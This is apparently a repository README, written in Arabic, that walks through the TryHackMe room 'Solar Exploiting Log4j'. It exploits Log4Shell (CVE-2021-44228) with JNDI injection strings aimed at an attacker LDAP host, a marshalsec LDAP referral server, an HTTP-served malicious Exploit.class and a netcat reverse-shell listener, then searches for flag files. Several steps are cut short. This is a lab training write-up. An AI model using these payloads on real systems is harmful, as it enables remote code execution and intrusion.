
يقدم هذا المستودع دليلاً مفصلاً لغرفة *Solar Exploiting Log4j* على TryHackMe، مع التركيز على استغلال الثغرة الأمنية الحرجة Log4Shell (CVE-2021-44228). يوضح المشروع كيف يمكن للمهاجمين استغلال آليات التسجيل غير الآمنة في تطبيقات Java لتحقيق تنفيذ التعليمات البرمجية عن بعد.
المنصة: TryHackMe الصعوبة: متوسط الموضوع: Log4Shell (ثغرة Log4j)
استغلال ثغرة Log4j (CVE-2021-44228) للحصول على تنفيذ الأوامر عن بُعد والتقاط الأعلام.
nmap -sC -sV <TARGET_IP>
ثغرة Log4j تسمح بحقن JNDI:
${jndi:ldap://<ATTACKER_IP>:1389/a}
إذا تم تسجيل الإدخال → فالثغرة موجودة.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
تشغيل خادم LDAP:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
إنشاء كلاس Java ضار (Exploit.class)
حقن الحمولة في الحقل المعرض للخطر:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 استخدم رؤوس مثل:
بمجرد التشغيل:
تحقق:
sudo -l
ابحث عن:
find / -name flag.txt 2>/dev/null
cat flag.txt